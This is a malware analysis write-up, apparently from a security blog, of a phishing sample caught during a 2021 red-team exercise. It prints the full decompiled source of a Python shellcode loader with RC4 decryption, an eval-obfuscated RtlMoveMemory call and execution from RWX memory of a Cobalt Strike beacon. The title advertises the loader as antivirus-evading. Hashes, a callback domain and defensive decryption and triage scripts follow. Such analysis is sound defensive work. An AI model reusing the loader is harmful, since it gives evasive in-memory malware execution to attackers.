2021 HW Sample Analysis (with an AV-evading shellcode loader)

Category: Reverse Engineering


0x01 Original email and sample


During the HW exercise, the internal mail gateway received a phishing email.


The original email follows:

[screenshot of the original phishing email]


Unpacking the attachment yields the sample

财险内部旅游套餐方案.pdf.exe

The sample is 5.88 MB; its hashes are:

MD5: 5bc32973b43593207626c0588fc6247e

SHA-1: 551414cb283a56cf55817c720c2efee0144ea2ed

SHA-256: d12e852eeefa87e75c7876fb53947b979bfbf880eb825eb58b9fe7f0132809ad

VirusTotal detection is 14/69, so the evasion is passable.

[screenshot of the VirusTotal result]


YARA rule matching identifies it as a typical Cobalt Strike x64 HTTPS beacon payload.

[screenshot of the YARA match]


Judging from the program's size and the functions recovered by reversing, the malicious sample is a shellcode loader written in Python that loads Cobalt Strike x64 HTTPS beacon shellcode, packaged with py2exe.


Unpacking the program with unpy2exe and decompiling the extracted bytecode recovers its source:

# uncompyle6 version 3.7.4
# Python bytecode 3.7
# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)]
# Embedded file name: py36test.py

import ctypes, urllib, base64, requests, hashlib  # urllib and requests are imported but never used

def shellCodeLoad(shellcode):
    # 64-bit return type so the allocation address is not truncated to 32 bits
    ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
    # 12288 = 0x3000 = MEM_COMMIT | MEM_RESERVE, 64 = 0x40 = PAGE_EXECUTE_READWRITE:
    # the RWX allocation is the first detection-relevant artefact of this loader
    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(12288), ctypes.c_int(64))
    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
    # The base64 string hides the copy step from string-based scanners; it decodes to
    # ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr),buf,ctypes.c_int(len(shellcode)))
    eval(base64.b64decode('Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KGN0eXBlcy5jX3VpbnQ2NChwdHIpLGJ1ZixjdHlwZXMuY19pbnQobGVuKHNoZWxsY29kZSkpKQ=='))
    # run the RWX buffer on a new thread and block on it (-1 = INFINITE)
    handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))
    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))

def rc4(text, key):
    # RC4 key is the hex MD5 digest of the password; the input is base64-decoded first
    key = hashlib.md5(key).hexdigest()
    text = base64.b64decode(text)
    result = ''
    key_len = len(key)
    box = list(range(256))
    j = 0
    for i in range(256):  # key-scheduling algorithm (KSA)
        j = (j + box[i] + ord(key[(i % key_len)])) % 256
        box[i], box[j] = box[j], box[i]
    i = j = 0

    for element in text:  # keystream generation (PRGA) XORed with each byte
        i = (i + 1) % 256
        j = (j + box[i]) % 256
        box[i], box[j] = box[j], box[i]
        # the decompiler output read "box + box[j]"; the RC4 index is box[i] + box[j]
        k = chr(element ^ box[((box[i] + box[j]) % 256)])
        result += k
    return result

if __name__ == '__main__':
    b = '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'  # embedded encrypted payload
    mm = 'king6666'  # RC4 password
    c = rc4(b, mm.encode('utf-8'))
    code = bytearray(base64.b64decode(c))  # second base64 layer yields the raw shellcode
    shellCodeLoad(code)

Analysis shows that the malicious sample decrypts base64-encoded shellcode with RC4 (keyed with the MD5 hex digest of the password), then uses VirtualAlloc to reserve an executable memory region, copies the shellcode into it and runs it on a new thread.

Write a decryption script:

import base64, hashlib  # the loader's ctypes, urllib and requests imports are not needed for decryption

def rc4(text, key):
    # same scheme as the sample: key = hex MD5 of the password, input base64-decoded first
    key = hashlib.md5(key).hexdigest()
    text = base64.b64decode(text)
    result = ''
    key_len = len(key)
    box = list(range(256))
    j = 0
    for i in range(256):  # key-scheduling algorithm (KSA)
        j = (j + box[i] + ord(key[(i % key_len)])) % 256
        box[i], box[j] = box[j], box[i]
    i = j = 0
    for element in text:  # keystream generation (PRGA) XORed with each byte
        i = (i + 1) % 256
        j = (j + box[i]) % 256
        box[i], box[j] = box[j], box[i]
        k = chr(element ^ box[((box[i] + box[j]) % 256)])  # RC4 index is box[i] + box[j]
        result += k
    return result

b = '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'  # encrypted payload from the sample
mm = 'king6666'  # RC4 password from the sample
c = rc4(b, mm.encode('utf-8'))
code = bytearray(base64.b64decode(c))  # inner base64 layer yields the raw shellcode
print(code)

This yields the shellcode:

[screenshot of the decrypted shellcode]


The callback address is www.alibababaa.com.


This is typical Cobalt Strike HTTPS x64 beacon shellcode.
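The decryption step and the callback-host lookup above, as an added example that is not part of the original post. It reimplements the sample's layering (base64 outside, RC4 keyed with the hex MD5 of the password, base64 inside) on bytes rather than on a str, so the result can be written to disk or hashed directly, and it adds two checks an analyst wants on the output: a prologue heuristic for x64 stagers (the FC 48 83 E4 F0 E8 "cld; and rsp,-16; call" opening is my assumption about typical Metasploit-style stagers, not something the post states) and extraction of printable strings, which is how a callback host such as the one above surfaces. The payload and password it uses are constructed for the example.

```python
"""Added example (not the original post's code): bytes-level RC4 unwrapping of the
sample's double-layer encoding plus two quick checks on the decrypted blob."""
import base64
import hashlib
import re


def rc4(data: bytes, key: bytes) -> bytes:
    """RC4 as the sample uses it: the key is the lowercase hex MD5 digest of the password."""
    key = hashlib.md5(key).hexdigest().encode()
    box = list(range(256))
    j = 0
    for i in range(256):  # key-scheduling algorithm (KSA)
        j = (j + box[i] + key[i % len(key)]) % 256
        box[i], box[j] = box[j], box[i]
    out = bytearray()
    i = j = 0
    for byte in data:  # keystream generation (PRGA), XORed with each input byte
        i = (i + 1) % 256
        j = (j + box[i]) % 256
        box[i], box[j] = box[j], box[i]
        out.append(byte ^ box[(box[i] + box[j]) % 256])
    return bytes(out)


def unwrap_payload(blob_b64: str, password: str) -> bytes:
    """base64 -> RC4 -> base64 -> raw shellcode, in the order the loader applies them."""
    inner = rc4(base64.b64decode(blob_b64), password.encode())
    return base64.b64decode(inner)


def wrap_payload(raw: bytes, password: str) -> str:
    """Inverse of unwrap_payload; used here only to build constructed test data."""
    inner = base64.b64encode(raw)
    return base64.b64encode(rc4(inner, password.encode())).decode()


# Heuristic (assumption, not from the post): Metasploit-style x64 stagers open with
# "cld; and rsp,-16; call ..." = FC 48 83 E4 F0 E8.
X64_STAGER_PROLOGUE = b"\xfc\x48\x83\xe4\xf0\xe8"


def looks_like_x64_stager(raw: bytes) -> bool:
    return raw.startswith(X64_STAGER_PROLOGUE)


def printable_strings(raw: bytes, min_len: int = 6) -> list:
    """ASCII runs of at least min_len bytes, the quickest way to spot a callback host."""
    return [m.decode() for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, raw)]


# Constructed payload: stager prologue, filler, and a fake callback host (not a real C2).
SAMPLE_RAW = X64_STAGER_PROLOGUE + b"\xc0\x00\x00\x00" + b"\x90" * 32 + b"www.c2-example.invalid\x00"
SAMPLE_PASSWORD = "constructed-password"
SAMPLE_BLOB = wrap_payload(SAMPLE_RAW, SAMPLE_PASSWORD)

if __name__ == "__main__":
    raw = unwrap_payload(SAMPLE_BLOB, SAMPLE_PASSWORD)
    print("x64 stager prologue:", looks_like_x64_stager(raw))
    print("strings:", printable_strings(raw))
```

To apply it to the real sample, pass the embedded payload string and the password 'king6666' shown above to unwrap_payload and write the returned bytes to a file for further analysis; because RC4 is symmetric, the same rc4 function serves both directions.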


This concludes the analysis.

This article first appeared on the WeChat official account 疯猫网络: 2021HW-样本分析(附免杀shellcode加载器)
